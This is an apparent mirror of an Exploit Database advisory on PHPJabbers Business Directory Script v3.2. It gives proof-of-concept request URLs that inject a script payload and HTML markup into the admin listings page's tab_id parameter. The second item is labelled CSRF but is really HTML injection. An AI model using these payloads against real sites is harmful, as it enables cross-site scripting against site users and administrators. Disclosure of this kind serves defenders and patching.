PHPJabbers Business Directory Script v3.2 – Multiple Vulnerabilities

• Exploit Database
• 155 阅读

• 作者： Kerimcan Ozturk
  日期： 2023-08-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51687/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  # Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities # Date: 09/08/2023 # Exploit Author: Kerimcan Ozturk # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/business-directory-script/ # Version: 3.2 # Tested on: Windows 10 Pro ## Description   Technical Detail / POC ========================== Login Account Go to Property Page ( https://website/index.php?controller=pjAdminListings&action=pjActionUpdate) Edit Any Property ( https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57 )   [1] Cross-Site Scripting (XSS)   Request: https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id= "<script><image/src/onerror=prompt(8)>   [2] Cross-Site Request Forgery   Request: https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id= "<script><font%20color="green">Kerimcan%20Ozturk</font>   Best Regards